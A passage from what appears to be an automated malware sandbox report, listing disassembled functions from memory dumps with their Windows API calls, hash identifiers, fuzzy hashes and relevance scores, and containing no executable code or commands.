              • Opcode Fuzzy Hash: 98e3d036dcdc03250bcfecc8c7b822304045f5f255a609b97373b4c989a01c18
              • Instruction Fuzzy Hash: 79016D759043449FDB20CF5AD8847A6FBA4EF04320F18C4ABDD4A8F656D279E448CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BB806, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,?,?,?), ref: 014BB841
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: MessageSend
              • String ID:
              • API String ID: 3850602802-0
              • Opcode ID: 8415b80b00e80f3a577af41edce3dc96b0813b50525833c22b3bf170a927e406
              • Instruction ID: a720a2aad8cf8552b166ac36d41bd6c15e29e3f58dfb2d2e16cafad8ae10c4a6
              • Opcode Fuzzy Hash: 8415b80b00e80f3a577af41edce3dc96b0813b50525833c22b3bf170a927e406
              • Instruction Fuzzy Hash: 7E012C359007449FDB218F56D884BA6FBA0EF04720F08C49ADD454B666D275A458DBB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA8EE, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 014BA926
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              • Opcode ID: 699ac36ba7b1014b1dd3f29ee3cecc7ef1e0280302e837e6528cdbe7b7c366b3
              • Instruction ID: c21468b5c51038a1356d4f247950ac06b65a9fc81069dba7c320f254aa899ab3
              • Opcode Fuzzy Hash: 699ac36ba7b1014b1dd3f29ee3cecc7ef1e0280302e837e6528cdbe7b7c366b3
              • Instruction Fuzzy Hash: EF018B359007049FDB208F0AD885792FFA0EF04320F18C8AADD860B666D275A419DA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BA372, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
              Download Yara Rule
              APIs
              • SetErrorMode.KERNELBASE(?), ref: 014BA3A4
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              • Opcode ID: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction ID: 846632142687a3828dd991d2ae69b4c16987d5693f3368fcd29b12415b60bb7a
              • Opcode Fuzzy Hash: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction Fuzzy Hash: F5F081355013449FD7208F1AD8847A5FF90DF04320F58D09ADD454BB56D2B9A458CA72
              Uniqueness

              Uniqueness Score: -1.00%

              Function 014BBE3E, Relevance: 1.5, APIs: 1, Instructions: 35windowCOMMON
              Download Yara Rule
              APIs
              • DispatchMessageW.USER32(?), ref: 014BBE70
              Memory Dump Source
              • Source File: 0000000C.00000002.909978929.00000000014BA000.00000040.00000001.sdmp, Offset: 014BA000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              • Opcode ID: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction ID: ee3bfb961d18b9c6449f902b2d1afb862f7c446675779ac12bb6339c24d1fd0c
              • Opcode Fuzzy Hash: a2908104d8a349b23c058ec5278130cc8492139b53e80452adfd9fa9484cfeea
              • Instruction Fuzzy Hash: 36F08C359043449FDB208F0AD8847A2FBA0EF04330F08C4AADE494B766D279A448CAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A02E8, Relevance: 1.5, Strings: 1, Instructions: 222COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: c4aa68a36c9a62345fc96d9c1cc4dc589ebc0d1d281ddef171f3151a5ebec9ac
              • Instruction ID: 840b2a00831a6115c398a38b548c21480f701b4d29e5d59a72174a8869c8d4e6
              • Opcode Fuzzy Hash: c4aa68a36c9a62345fc96d9c1cc4dc589ebc0d1d281ddef171f3151a5ebec9ac
              • Instruction Fuzzy Hash: F7719031B052058FDB08DB69C4546AEBBE3FFC9710F24846ED506EB360DA75AC42CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AFB08, Relevance: 1.4, Strings: 1, Instructions: 200COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: MOC
              • API String ID: 0-624257665
              • Opcode ID: a72d3c41b49aa85d7d67cafcfa38e9a07341c0ee48911082359e64c618908b96
              • Instruction ID: accfc614e176402b855133e155ebea830f99eab50f76e15a83afa196df2fa810
              • Opcode Fuzzy Hash: a72d3c41b49aa85d7d67cafcfa38e9a07341c0ee48911082359e64c618908b96
              • Instruction Fuzzy Hash: 05717B39A04A05DFC715DF6AC89496AFBF2BF88300B24892DD55787A60DB31EC42CF56
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A8500, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: r*+
              • API String ID: 0-3221063712
              • Opcode ID: c6fed4c13614ea231619af401748680486868644e05438febc38744a00d67425
              • Instruction ID: b88d21831e3979788fdb02fbd20f32edd6a43c94b476803c06b0435fe506e84a
              • Opcode Fuzzy Hash: c6fed4c13614ea231619af401748680486868644e05438febc38744a00d67425
              • Instruction Fuzzy Hash: 5D412B71E0420ADFDB98DBA5C5596AEBBF2FF44300F1084AAD802A7260DB749E42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A21F8, Relevance: 1.3, Strings: 1, Instructions: 98COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID: r*+
              • API String ID: 0-3221063712
              • Opcode ID: 86b1b1b5165d42441c7e8fcc6992a59886533230cca60d21a3e93a994a825d91
              • Instruction ID: 203e4acb1177304c5ff02224d3af96ed775f1cfd79975f5ca0557fbcc46b1486
              • Opcode Fuzzy Hash: 86b1b1b5165d42441c7e8fcc6992a59886533230cca60d21a3e93a994a825d91
              • Instruction Fuzzy Hash: 33412C35E48209CFCB64DFA5C0656AEBBB2FF45304F1080AAD402A7664E7359E46CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD08F8, Relevance: 1.3, Strings: 1, Instructions: 76COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID: j
              • API String ID: 0-2137352139
              • Opcode ID: b98aa2eba6a9a1cd1553e3f3bbff5ac65ff6b65876dcb40f4d39bbdbd0f77e40
              • Instruction ID: dc5a6952e29d76a129115577f763bc52dbf95caf9b17c2e10617880a15465c7c
              • Opcode Fuzzy Hash: b98aa2eba6a9a1cd1553e3f3bbff5ac65ff6b65876dcb40f4d39bbdbd0f77e40
              • Instruction Fuzzy Hash: 7E31F970A01B10CFE7B9CF3AC554256FBF2BF84304F54886EC68A86AA1DB76A445CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A12A0, Relevance: .5, Instructions: 460COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d448edb9296ff7e5283e77eec948165d2dfd180b78ec8b21e7850906baa3ee9c
              • Instruction ID: 335c714397e2679957bda813c0ba0ed15115c843871da9a45184f8c8c39c5012
              • Opcode Fuzzy Hash: d448edb9296ff7e5283e77eec948165d2dfd180b78ec8b21e7850906baa3ee9c
              • Instruction Fuzzy Hash: 2222C038A00645CFCB24DF28C490A6ABBF2FF89340F50859AE85A9B755DB34ED46CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7B66, Relevance: .4, Instructions: 439COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ba99ac7c2285811f1069e88b69e631729e2c12b725bdcf08bdc6cd7ca1197eaa
              • Instruction ID: c796898dc7c69931e8246581cc588421cddcdfddc10233a64e33237963b4059c
              • Opcode Fuzzy Hash: ba99ac7c2285811f1069e88b69e631729e2c12b725bdcf08bdc6cd7ca1197eaa
              • Instruction Fuzzy Hash: 6A02F435A00605CFCB24DB68C598A69B7F2FF88310F6485A9D85ADB765DB30EC42CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0110, Relevance: .4, Instructions: 382COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 311d472763867b03957d4e82f340c490a28dd649fb1de0ecbb4efa285e85e998
              • Instruction ID: 7d52414e7e7b5f4bca28f611ce13f5c1616de0a94d8855d9c471160192bc5aa3
              • Opcode Fuzzy Hash: 311d472763867b03957d4e82f340c490a28dd649fb1de0ecbb4efa285e85e998
              • Instruction Fuzzy Hash: 8DE15B34A00219CFCB55DF69C484A9EFBB2BF85314F158599D90AAB312DB71ED82CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5E00, Relevance: .2, Instructions: 241COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 85bca2cd2f7df001662fdfed5a3c73698cc6705657ddcf1e4fd7855e63018c59
              • Instruction ID: 93a2f06d1a0ca29ec104402585e807963c4a57d7d992c2021bb054a2a0bc999b
              • Opcode Fuzzy Hash: 85bca2cd2f7df001662fdfed5a3c73698cc6705657ddcf1e4fd7855e63018c59
              • Instruction Fuzzy Hash: A5810D32A006198FCF25CF14C890A9AF7B3BF85304F158595D90AAF216DB71AE86CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AA9CF, Relevance: .2, Instructions: 225COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4dfca25b4b16ef88fc3f58026ce3c24de4c5a7834510df10902ea173693bde1b
              • Instruction ID: 48ddc2cc7d54107c1c8108298d88ea1d1e72bca67e60703e930b756bf2a7aacb
              • Opcode Fuzzy Hash: 4dfca25b4b16ef88fc3f58026ce3c24de4c5a7834510df10902ea173693bde1b
              • Instruction Fuzzy Hash: 8781E6307006168BD744EB69C494B6EB7A7FFD4304F60862ED6059B7A8DF70AC16CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE768, Relevance: .2, Instructions: 184COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 132ce144a883c341228910d959d25c33f5804c67b5e8bc71619ac789d37fd190
              • Instruction ID: e077894d2aace35f57c1f2ce1b5506171480d781bfbe4bb200460c7153fe0cda
              • Opcode Fuzzy Hash: 132ce144a883c341228910d959d25c33f5804c67b5e8bc71619ac789d37fd190
              • Instruction Fuzzy Hash: 7D714B35A04604CFDBA4CB69C498BADBBF6BF48314F148559E456A7761CB32EC82CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A09A0, Relevance: .2, Instructions: 176COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa1d9c4229308fdf439b7506325a926003143c6555ab5a138abc708053757c71
              • Instruction ID: 393eb4a21c693aee29a0d7ec5b82686bd988f0490d581aa2256b46c5f97cfcc4
              • Opcode Fuzzy Hash: aa1d9c4229308fdf439b7506325a926003143c6555ab5a138abc708053757c71
              • Instruction Fuzzy Hash: 3A51E536B04215DFCB14DB68D998AAEB7F3FF84314F208469E5069B664CB31AD02CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD06A8, Relevance: .2, Instructions: 170COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82b5cfe7f74b4792d193365ab5328a57aad9bd70707037345eb912471d01081e
              • Instruction ID: 2927e3166e66894684d349d1785bde16d0544845ace81c156924df79a2406d17
              • Opcode Fuzzy Hash: 82b5cfe7f74b4792d193365ab5328a57aad9bd70707037345eb912471d01081e
              • Instruction Fuzzy Hash: E9519F35B00215AFDB45DF69D48089EFBA6FF84310B16816AE90A9F216DB31EC52CBD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE000, Relevance: .2, Instructions: 164COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b8593f179cd5cd3e1434f6011207c086e94a1d35da0142b1790bf004a19b12e2
              • Instruction ID: 472d52c64db7509097e1cc28a4ddffd7f27d3e4b62e311afa673421f3b5dd6cf
              • Opcode Fuzzy Hash: b8593f179cd5cd3e1434f6011207c086e94a1d35da0142b1790bf004a19b12e2
              • Instruction Fuzzy Hash: 15517C32A00519DFCB54DF94C8808ADB7BBFF88300B048459E906AF355DB32AD56CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A7400, Relevance: .2, Instructions: 161COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd67715057913af1ba141b8eed15b4aa39beacf27110a38fce772cc226cdf756
              • Instruction ID: d850d12c9527a39e518dc638b532702a74ebb19c31c712baf78cda0b0c09d319
              • Opcode Fuzzy Hash: dd67715057913af1ba141b8eed15b4aa39beacf27110a38fce772cc226cdf756
              • Instruction Fuzzy Hash: CE31F73290061ACFDF11CF24C854ADABBB2EF85305F518595D909BB215DB74AE8ACFD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6F10, Relevance: .2, Instructions: 159COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 79012f756880c4fbe66124f0a8a6026160ecd48e6121928a28220534c5dab1fc
              • Instruction ID: d80685e76fd0db6cd5916623ab611e72718b147014962cc244cfbccca026f9aa
              • Opcode Fuzzy Hash: 79012f756880c4fbe66124f0a8a6026160ecd48e6121928a28220534c5dab1fc
              • Instruction Fuzzy Hash: AC514E72F002198FCB18DBB9C4546AEB7F3EF98310B258569D40AAB354DE31EC42CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A78E8, Relevance: .1, Instructions: 147COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 74d528895f11f847d8e9c08ae596a0b3551af39277acd92680c388d6c4f1f4db
              • Instruction ID: b48d61366ee5982fd78e5027dc7781757d1513b4144b408cd9ccc384014bd510
              • Opcode Fuzzy Hash: 74d528895f11f847d8e9c08ae596a0b3551af39277acd92680c388d6c4f1f4db
              • Instruction Fuzzy Hash: 3E51F376D00619DFCB14CFA8C98469DBBF2FF48310F20866AD55AA7254EB316D56CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056ACAC8, Relevance: .1, Instructions: 136COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 95af2f9948e0e2b8ed9298fb743d57397e256da8b84425da054a1ebbfbb7c136
              • Instruction ID: d76d2ab3eaf78dc965ea9de801950fd68b704897910e62eee0ba7f1f993ad187
              • Opcode Fuzzy Hash: 95af2f9948e0e2b8ed9298fb743d57397e256da8b84425da054a1ebbfbb7c136
              • Instruction Fuzzy Hash: 3241AF32A007059FEB28DF79C49456BBBE2FB88310B14C52DE45797650DB35AC02CF94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0BC0, Relevance: .1, Instructions: 132COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60b03e4cc96c3f0604febb08c13d79880827c5a7863432876eb18e95ba7ef6ab
              • Instruction ID: 96c240a1a032f9d2b24917524d051387a4510cfdcc049f65715d2f503d92566e
              • Opcode Fuzzy Hash: 60b03e4cc96c3f0604febb08c13d79880827c5a7863432876eb18e95ba7ef6ab
              • Instruction Fuzzy Hash: F841B832B041089FD715DB29C4586AE77E7AF85310F15806AE80BEF7A1CE719D06CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AE758, Relevance: .1, Instructions: 130COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aabfe6f3eadfa0236fa6bc83726c4bcc10133c953ef245e1f59e17bd6847f1f7
              • Instruction ID: fce857b98ede2744e4f8b285c1e0bf86f49896a58c04423d154dd422488f6299
              • Opcode Fuzzy Hash: aabfe6f3eadfa0236fa6bc83726c4bcc10133c953ef245e1f59e17bd6847f1f7
              • Instruction Fuzzy Hash: 52514C32A04604CFEBA4CF69C484BA9BBF6BF48314F148559D452A7761CB32EC85CF90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A0682, Relevance: .1, Instructions: 129COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2bf7bbb18c82c42c7c076041c0958698ed6e98ec2f36bb830e0834ac143fa0e7
              • Instruction ID: 652110bc0ca49fdc635f42486213251f8eaf563f9badd02b07eaca93a86e04dd
              • Opcode Fuzzy Hash: 2bf7bbb18c82c42c7c076041c0958698ed6e98ec2f36bb830e0834ac143fa0e7
              • Instruction Fuzzy Hash: 08415A316002018FD7A5AB36E85C66D3BA7BB90753B14856AF502CB2B8DF749C42CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A1458, Relevance: .1, Instructions: 128COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fdaf2c1a524f8fd1944b080d08b81570daed3a2f88b56894af33d2eb8bb1ff01
              • Instruction ID: c7aae2053807ca1c79c55ba3ea2dcabfb21972d2bdcbe8773114063637cfaa37
              • Opcode Fuzzy Hash: fdaf2c1a524f8fd1944b080d08b81570daed3a2f88b56894af33d2eb8bb1ff01
              • Instruction Fuzzy Hash: 5451E074A04259CFDB14DF64C894B9DBBB2BF49300F5081EAE40AAB365CB35AD85CF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A5508, Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39a43a120fae7f4059a5edab494b97bd674c86c60151ed69ff644218eef4d012
              • Instruction ID: 72157ca2ad5d8858dfa6628867e5a08fdd3aad8721bd1f7fd41e6465439ad68a
              • Opcode Fuzzy Hash: 39a43a120fae7f4059a5edab494b97bd674c86c60151ed69ff644218eef4d012
              • Instruction Fuzzy Hash: 5B416A36B082018FDF64EB76941823E7AA76BD4651F148869D407CB7A4EE38DC42CF55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A81E0, Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e7ccd09a4076eace05b39d4c3961514d34bb8362233d462a70f32d6656c2d34
              • Instruction ID: 29240cfbac2622e7795fb0f07a85de5a7c2e4e52ec984d116be8ece03424aa7d
              • Opcode Fuzzy Hash: 4e7ccd09a4076eace05b39d4c3961514d34bb8362233d462a70f32d6656c2d34
              • Instruction Fuzzy Hash: 4441B032A04606CFCB20CBA8C4889BDFBB1FF44324F108666E4169B655E770AC56CFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF730, Relevance: .1, Instructions: 123COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f0d52cafc429e3e8b41221ff51fe5ee872b2061e0681dc248562febbe4cd69c5
              • Instruction ID: 8ab8e3df141f90159fb398e176b6a2121d7f37445721f2f7fa767ac087cc8a4b
              • Opcode Fuzzy Hash: f0d52cafc429e3e8b41221ff51fe5ee872b2061e0681dc248562febbe4cd69c5
              • Instruction Fuzzy Hash: 93510739A00205CFDB05DFA8D580EADBBF2BB88324F159599D911AB365DB31EC81CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A2BF8, Relevance: .1, Instructions: 122COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 047142366bffa1d30d0835ac207885fd2902b609d066ed8d512126d850c28ea2
              • Instruction ID: 44ac137c0e1236b636cd711122523eb1ebf787a3f6ee3cdc150a7d38653911f0
              • Opcode Fuzzy Hash: 047142366bffa1d30d0835ac207885fd2902b609d066ed8d512126d850c28ea2
              • Instruction Fuzzy Hash: 1E41477A64C391CFD3A5C728D4A8978BBF2BF42310B1585ABD447CB662C7608C42CF92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6A90, Relevance: .1, Instructions: 122COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 65894887bc1b9865430e227f82533da0411338603a68ec9a1493c337876e99ab
              • Instruction ID: 68b58b69528266e837b39f786471910950efc80d85bc5e49788eca5c6d5875da
              • Opcode Fuzzy Hash: 65894887bc1b9865430e227f82533da0411338603a68ec9a1493c337876e99ab
              • Instruction Fuzzy Hash: 2141BF39B00240CFCB45EF66D45406E7BF2FB8D221754416DE90AEB791CB7AAC51CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0A58, Relevance: .1, Instructions: 121COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2a2e37291d531d5815655a7ca01867aeb383d42057418e569efe605b194eefac
              • Instruction ID: 3e7ab81535408811619d074e6975f3f6a9cf3ebc4a565dccdb7d9b7383b86d2a
              • Opcode Fuzzy Hash: 2a2e37291d531d5815655a7ca01867aeb383d42057418e569efe605b194eefac
              • Instruction Fuzzy Hash: BE41AF71F042459FDB98DFB9D0506ADBBB2FB88300F50856ED50AAB394DB349D46CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 015504EB, Relevance: .1, Instructions: 119COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.910139948.0000000001550000.00000040.00000040.sdmp, Offset: 01550000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c3ae31a429f1bcc235c8dae5c6d1b3bff12bb91b9425b890b81957f654c1d859
              • Instruction ID: d5094a9de9c61fcc21f1a647bfea405e50624088ec35fa70fe051e16b4d0a678
              • Opcode Fuzzy Hash: c3ae31a429f1bcc235c8dae5c6d1b3bff12bb91b9425b890b81957f654c1d859
              • Instruction Fuzzy Hash: 6821287044E3C49FD3939B209C699A17FB4EE4322071A80DBD884CF1A3D5286E59DB36
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A6AA0, Relevance: .1, Instructions: 115COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e059eb7a3c4b3b42b5c4696aad8fc0f7425960a5c7f34f8e54e61d56150db3d
              • Instruction ID: 59a77a20c149b4f3d517b595dabde7fb261fab5234f71d09e4c87853a3a67d2c
              • Opcode Fuzzy Hash: 1e059eb7a3c4b3b42b5c4696aad8fc0f7425960a5c7f34f8e54e61d56150db3d
              • Instruction Fuzzy Hash: 0641CE38B00240CFCB05EF66D45446EBBB2FB8D621754406CE90AA7791CF36AC11CBA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AAD70, Relevance: .1, Instructions: 113COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 060df8a723fbd80d814b54d6aade0ff065a959e3a808d6cf15633a6ff6c3ff1f
              • Instruction ID: 12b07a051b8b44009aa656b535044f2f4f2d2a5bf4bc7d64ffbef571df7fe34a
              • Opcode Fuzzy Hash: 060df8a723fbd80d814b54d6aade0ff065a959e3a808d6cf15633a6ff6c3ff1f
              • Instruction Fuzzy Hash: D731F371B002658FC714DBA9C49056DFBF2BF88310B10842EE40AE7711DB31EC12CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 06CD0C50, Relevance: .1, Instructions: 107COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 85a22948a8fe8c095d7758f0b5ba9266e9d23303333cd52a155e7781f40aad3d
              • Instruction ID: debec9f645aa7fcd334076e67934854a5000118c279fa51c9de5a48a1aec8e3c
              • Opcode Fuzzy Hash: 85a22948a8fe8c095d7758f0b5ba9266e9d23303333cd52a155e7781f40aad3d
              • Instruction Fuzzy Hash: 8A41EF74E00208DFDB94CFA9C580A9DBBF2FF48314F24856AE515AB315D731A982CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056AF8F2, Relevance: .1, Instructions: 105COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fffd16bb383da7b5b41fbe2fa34a66a8b59e8d6e89b52fddb8c1af473bbb0d4a
              • Instruction ID: 7f79ca9bd8076a040fda4f82689d9adf42a97e669c2a4e13afa29bf8c1abd8a8
              • Opcode Fuzzy Hash: fffd16bb383da7b5b41fbe2fa34a66a8b59e8d6e89b52fddb8c1af473bbb0d4a
              • Instruction Fuzzy Hash: BD316831B083619FCB11E7BD88546BEBBB27F85610B24415EE085EB795DE708D02C7E2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 056A02DA, Relevance: .1, Instructions: 105COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b21ee40ca478c307bf6e3b6ac7424193d1f62a79c75cbae6fca067ffe7645d7
